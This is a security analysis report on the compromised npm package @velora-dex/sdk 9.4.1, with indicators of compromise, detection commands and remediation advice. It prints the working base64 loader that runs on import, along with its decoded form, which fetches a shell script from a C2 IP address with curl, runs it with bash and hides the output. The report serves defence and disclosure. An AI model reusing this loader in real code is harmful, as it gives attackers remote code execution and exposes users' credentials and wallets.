
Velora (formerly ParaSwap) SDK Version 9.4.1 Compromised And Installing Malware

The npm package @velora-dex/sdk version 9.4.1 contains malicious code that automatically downloads and executes a shell script from a remote server when the

By c0a15726-c5b1-4b0d-85e6-fe15553df9e2 ·


During a security audit of multiple versions of the @velora-dex/sdk package, suspicious code was identified in the package entry point (dist/index.js) of version 9.4.1. Further investigation revealed a base64-obfuscated payload that downloads and executes a remote shell script from a command-and-control (C2) server, giving the attacker arbitrary code execution on any system that loads the package. Because the code sits in the entry point rather than in an install script, it runs the first time the package is required or imported, not at npm install time.

Impact: The attacker gains arbitrary code execution on the victim's system with the privileges of the Node.js process. This could enable:

  • Cryptocurrency wallet theft

  • Private key exfiltration

  • Environment variable harvesting (API keys, credentials)

  • Backdoor installation

  • Lateral movement within infrastructure

The @velora-dex/sdk package is a popular SDK for interacting with the Velora decentralized exchange (DEX). As a critical infrastructure component in the Web3/DeFi ecosystem, it's used by developers building cryptocurrency trading applications, making it a high-value target for supply chain attacks.

This incident represents a sophisticated supply chain attack targeting the Web3/DeFi ecosystem. The surgical nature of the attack (affecting only a single release version while leaving development builds clean) suggests the attacker had specific knowledge of the release process.

This attack highlights weaknesses in the npm ecosystem. Build and publish pipeline security remains a weak point; a single layer of base64 is enough to get past string-based static analysis; and code that runs on import (or through install scripts) gives whoever controls a release arbitrary execution on every consumer. And, as many know, cryptocurrency-related packages are high-value targets.

Key Findings:

  • Only version 9.4.1 is compromised (out of 15 versions analyzed)

  • Development versions (9.4.1-dev.1, 9.4.1-dev.2) are clean

  • Attack vector suggests build pipeline compromise, not source repository

  • Malicious payload executes automatically on package import

  • C2 infrastructure: IP address 89.36.224.5

  • Remediation version 9.4.2 removed the malicious code

Technical analysis

Malicious Code Location

File: package/dist/index.js (lines 4-5)
Version: 9.4.1 only

Obfuscated Payload

// dist/index.js in 9.4.1, lines 4-5. The base64 blob is decoded by the shell and piped into bash;
// the exec callback discards error, stdout and stderr, so a failed fetch is just as silent as a successful one.
const {exec} = require('child_process');
exec(`echo 'bm9odXAgYmFzaCAtYyAiJChjdXJsIC1mc1NMIGh0dHA6Ly84OS4zNi4yMjQuNS90cm91Ymxlc2hvb3QvbWFjL2luc3RhbGwuc2gpIiA+IC9kZXYvbnVsbCAyPiYx' | (base64 --decode 2>/dev/null || base64 -D) | bash`, function(error, stdout, stderr) {});

Deobfuscated Payload

The base64 string decodes to:

nohup bash -c "$(curl -fsSL http://89.36.224.5/troubleshoot/mac/install.sh)" > /dev/null 2>&1

Attack Flow

  1. Automatic Execution: Code runs immediately when the package is imported/required

  2. Base64 Obfuscation: Payload is encoded to evade basic static analysis

  3. Cross-Platform Compatibility: Uses both GNU (base64 --decode) and macOS (base64 -D) decode flags

  4. Remote Download: Uses curl to fetch a shell script from the C2 server

  5. Silent Execution: All output redirected to /dev/null to avoid detection

  6. Detachment: nohup makes the spawned bash ignore SIGHUP, so the download-and-run continues after the importing Node.js process (and its terminal) exits. This is not persistence across reboots; anything longer-lived would have to be set up by install.sh itself

What Does It Do?

The malicious code performs the following actions:

  1. Spawns a child process using Node.js child_process.exec()

  2. Decodes a base64-encoded command

  3. Downloads a shell script from http://89.36.224.5/troubleshoot/mac/install.sh

  4. Executes the downloaded script with bash

  5. Runs silently in the background with no user interaction required

Velora malware C2 Infrastructure

Primary C2 Server

  • IP Address: 89.36.224.5

  • Protocol: HTTP (unencrypted)

  • Endpoint: /troubleshoot/mac/install.sh

  • Full URL: http://89.36.224.5/troubleshoot/mac/install.sh

Infrastructure Analysis

The path /troubleshoot/mac/install.sh is deliberately crafted to appear legitimate, potentially disguised as a macOS troubleshooting utility. The use of an IP address instead of a domain suggests:

  • Evasion of DNS-based security controls

  • Avoidance of domain registration trails

  • Resistance to domain takedown efforts

Historical Version Analysis

To determine the scope of the compromise, 15 versions of @velora-dex/sdk were analyzed:

Version Range    Versions Tested                        Status
9.1.x - 9.3.x    9.1.0, 9.2.0, 9.2.1, 9.3.0-9.3.6       All Clean ✅
9.4.0            9.4.0                                  Clean ✅
9.4.1-dev        9.4.1-dev.1, 9.4.1-dev.2               Both Clean ✅
9.4.1            9.4.1                                  MALICIOUS ❌
9.4.2+           9.4.2                                  Clean ✅

Key Observations

  1. Single Version Attack: Only version 9.4.1 contains the malicious payload

  2. Development Versions Clean: Both 9.4.1-dev.1 and 9.4.1-dev.2 are unaffected

  3. No Historical Compromise: All 10 earlier versions (9.1.0 through 9.3.6) are clean

  4. Rapid Remediation: Version 9.4.2 removed the malicious code

This pattern is consistent with a build or publish pipeline compromise rather than a source code repository breach. It is, however, an inference from the published artifacts alone: a malicious commit landing between 9.4.1-dev.2 and the 9.4.1 tag would look the same from the registry. Diffing the published 9.4.1 tarball against a build of the tagged source would settle it.

Attack Timeline (Reconstructed)

Based on package analysis and version history:

Timeline:
---------
[9.1.0 - 9.4.0]     Normal development, all versions clean
        ↓
[9.4.1-dev.1/2]     Development builds created, both clean
        ↓
[BUILD COMPROMISE]  Malicious code injected during 9.4.1 build/release
        ↓
[9.4.1 RELEASE]     Compromised package published to npm registry
        ↓
[DETECTION]         Attack discovered by security researchers
        ↓
[9.4.2 RELEASE]     Remediation version published, malware removed

Attack Vector Hypothesis

The evidence suggests the attacker likely:

  • Did NOT compromise the source code repository (dev versions are clean)

  • DID compromise the build/release pipeline for version 9.4.1

  • Had specific knowledge of the release process

  • Executed a surgical, single-version attack to minimize detection

Possible compromise vectors:

  • Compromised CI/CD credentials or tokens

  • Malicious GitHub Action or build script

  • Compromised maintainer account during release

  • Supply chain attack on build dependencies

Detection & Indicators of Compromise (IOCs)

Network Indicators

IP Address: 89.36.224.5
URL: http://89.36.224.5/troubleshoot/mac/install.sh
Protocol: HTTP/TCP Port 80

File Indicators

Malicious File Pattern:

# Search for malicious base64 payload
grep -r "bm9odXAgYmFzaCAtYyAiJChjdXJs" node_modules/

Package Identifier:

{
  "name": "@velora-dex/sdk",
  "version": "9.4.1"
}

Detection Commands

Check if you have the malicious version installed:

# Check installed version
npm list @velora-dex/sdk

# Search for malicious code in node_modules
find node_modules/@velora-dex -name "index.js" -exec grep -l "bm9odXAgYmFzaCAtYyAiJChjdXJs" {} \;

# Check package.json lock files
grep -A2 "@velora-dex/sdk" package-lock.json yarn.lock 2>/dev/null

Check for network connections to C2 server:

# Check active connections (Linux)
netstat -an | grep 89.36.224.5

# Check firewall/network logs
grep "89.36.224.5" /var/log/syslog /var/log/messages 2>/dev/null

# Note: the payload connects to an IP literal, so no DNS lookup is made and
# resolver logs (systemd-resolved and the like) will not show it. Search
# egress proxy and firewall logs for the IP instead.

Immediate Actions Required

If You Have Version 9.4.1 Installed

  1. Isolate the System - Disconnect from network if possible

  2. Remove the Package

npm uninstall @velora-dex/sdk

  3. Check for Outbound Connections

netstat -an | grep 89.36.224.5
lsof -i | grep 89.36.224

  4. Review Running Processes

ps aux | grep -E "(curl|bash|nohup)"

  5. Rotate All Credentials - Assume all environment variables, API keys, and secrets were exfiltrated

  6. Check Cryptocurrency Wallets - Review for unauthorized transactions

  7. Scan for Persistence Mechanisms - Check crontabs, startup scripts, SSH keys

  8. Install Clean Version

npm install @velora-dex/sdk@9.4.2

For CI/CD Environments

If version 9.4.1 was used in CI/CD pipelines:

  1. Rotate All CI/CD Secrets - API tokens, deployment keys, service account credentials

  2. Audit Recent Deployments - Review all deployments made while 9.4.1 was present

  3. Check for Lateral Movement - Examine logs for unusual access patterns

  4. Update Lock Files - Ensure package-lock.json/yarn.lock specify 9.4.2 or later

  5. Review Build Artifacts - Any containers/artifacts built with 9.4.1 should be considered compromised

Remediation

Update Package Version

Update to version 9.4.2 or later:

# Using npm
npm install @velora-dex/sdk@latest

# Using yarn
yarn upgrade @velora-dex/sdk@latest

# Verify version
npm list @velora-dex/sdk

Pin Safe Versions

Update your package.json to explicitly exclude the malicious version:

{
  "dependencies": {
    "@velora-dex/sdk": ">=9.4.2 <10.0.0"
  }
}

Changing the range does not by itself rewrite a lockfile that already resolved 9.4.1; run npm install (or yarn upgrade) afterwards and confirm the resolved version in package-lock.json/yarn.lock. npm has no .npmrc syntax for blocking a single version of a package. To force every copy in the tree, including transitive ones pulled in by other packages, onto a clean release, use the overrides field (npm 8.3+) or resolutions (yarn). npm requires an override for a direct dependency to use the same spec as the dependencies entry, hence the identical strings:

{
  "dependencies": {
    "@velora-dex/sdk": ">=9.4.2 <10.0.0"
  },
  "overrides": {
    "@velora-dex/sdk": ">=9.4.2 <10.0.0"
  }
}

Prevention & Security Recommendations

For Developers

  1. Dependency Pinning - Use exact versions in package.json for critical dependencies

  2. Lock File Integrity - Commit and review package-lock.json/yarn.lock changes

  3. Regular Audits - Run npm audit and security scanning tools regularly

  4. Least Privilege - Run Node.js processes with minimal required permissions

  5. Network Monitoring - Monitor outbound connections from development environments

  6. Checksum Verification - Verify package integrity using the integrity hashes in package-lock.json/yarn.lock. Know the limit: the hash only proves the tarball is the one the registry served, and 9.4.1 was published with a valid hash, so this catches tampering in transit or a changed tarball, not a malicious publish

For Organizations

  1. Private Registry - Use a private npm registry with security scanning (Artifactory, Verdaccio)

  2. Dependency Firewall - Implement tools like Snyk, Socket, or GitHub Dependabot

  3. SBOM Generation - Maintain Software Bill of Materials for all applications

  4. Incident Response Plan - Have procedures for supply chain compromise scenarios

  5. Security Training - Educate developers on supply chain attack vectors

  6. Network Segmentation - Isolate build environments from production infrastructure

For Package Maintainers

  1. 2FA Enforcement - Require two-factor authentication for all maintainers

  2. Build Reproducibility - Ensure builds are reproducible and auditable

  3. Code Signing - Sign releases with verified keys

  4. Access Logging - Monitor and log all package publish activities

  5. Automated Scanning - Integrate security scanning in CI/CD pipelines

  6. Provenance Attestation - Use tools like npm provenance or SLSA framework

Community Response & Disclosure

Responsible Disclosure Timeline

  • Detection Date: Undisclosed (based on 9.4.2 release)

  • Vendor Notification: Velora maintainers notified

  • Remediation Release: Version 9.4.2 published

  • Public Disclosure: This analysis

npm Registry Status

As of this writing:

  • Version 9.4.1 should be deprecated on npm

  • Users should be warned against installing this version

  • Maintainers should contact npm security to request version removal

Technical Artifacts

Deobfuscated Malicious Code

A fully deobfuscated and annotated version of the malicious payload has been created for analysis:

Location: extracted/9.4.1/package/dist/index.DEOBFUSCATED.js

This file contains detailed inline comments explaining each step of the attack and should NOT be executed.

Analysis Files

All extracted package versions and analysis artifacts are available in:

VeloraDEX/
├── extracted/
│   ├── 9.1.0/           # Historical version (clean)
│   ├── 9.2.0/           # Historical version (clean)
│   ├── 9.3.*/           # Historical versions (clean)
│   ├── 9.4.0/           # Pre-attack version (clean)
│   ├── 9.4.1/           # MALICIOUS VERSION
│   │   └── package/dist/index.DEOBFUSCATED.js  # Deobfuscated malware
│   └── 9.4.2/           # Remediation version (clean)
└── malware-analysis-report.md  # This document

Final Recommendations

  1. Immediate: Check all systems for version 9.4.1 and remediate

  2. Short-term: Implement enhanced monitoring for npm package integrity

  3. Long-term: Adopt zero-trust principles for dependency management


Indicators of Compromise (IOC) Summary

Package:
  name: "@velora-dex/sdk"
  malicious_version: "9.4.1"
  safe_versions: ["9.4.2", "9.4.0", "<=9.3.6"]

Network:
  c2_ip: "89.36.224.5"
  c2_url: "http://89.36.224.5/troubleshoot/mac/install.sh"
  protocol: "HTTP"
  port: 80

File_Artifacts:
  malicious_file: "node_modules/@velora-dex/sdk/dist/index.js"
  payload_signature: "bm9odXAgYmFzaCAtYyAiJChjdXJs"
  decoded_command: "nohup bash -c \"$(curl -fsSL http://89.36.224.5/troubleshoot/mac/install.sh)\" > /dev/null 2>&1"

Behavior:
  - Automatic execution on require/import
  - Outbound HTTP connection to 89.36.224.5
  - Shell script download and execution
  - Detached background execution (nohup)
  - Silent operation (output to /dev/null)


Contact & Reporting

If you have been affected by this malicious package or have additional information:

  • Report to npm: security@npmjs.com

  • Report to package maintainers: https://github.com/VeloraDEX/paraswap-sdk/issues


Disclaimer: This analysis is provided for educational and defensive security purposes only. The malicious code described should never be executed. Always analyze malware in isolated, sandboxed environments.

License: This analysis may be freely shared and reproduced for security awareness and defensive purposes.